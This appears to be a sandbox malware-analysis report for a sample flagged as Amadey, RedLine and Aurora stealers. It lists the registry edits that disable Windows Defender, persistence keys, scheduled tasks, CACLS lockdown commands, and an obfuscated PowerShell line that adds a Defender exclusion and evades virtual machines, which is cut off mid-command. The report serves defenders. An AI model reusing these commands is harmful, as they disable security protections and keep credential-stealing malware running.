Analysis Overview
SHA256
395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1
Threat Level: Known bad
The file 395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1 was found to be: Known bad.
Malicious Activity Summary
Aurora
RedLine payload
Amadey
Modifies Windows Defender Real-time Protection settings
RedLine
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Windows security modification
Looks up external IP address via web service
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Gathers network information
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-25 00:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-25 00:56
Reported
2023-02-25 00:59
Platform
win10-20230220-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ifconfig.me | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4308 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\rundll32.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\AASIapp.exe = "11001" | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe
"C:\Users\Admin\AppData\Local\Temp\395f9dcf0d0f6d92c7d1518f2744231547b8dadf08cee577ea9c3022b63c95b1.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sae82ET33.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sGf94Oe29.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sAl36tz78.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iMJ64Qj.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\kPe14na.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mzD76SI.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\niG10yv56.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rtz28ED46.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rtz28ED46.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ejy69Rn37.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe
"C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe"
C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe
"C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2023-03-12).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\";$4=\"4\";$5=\"5\";$6=\"6\";$7=\"7\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir 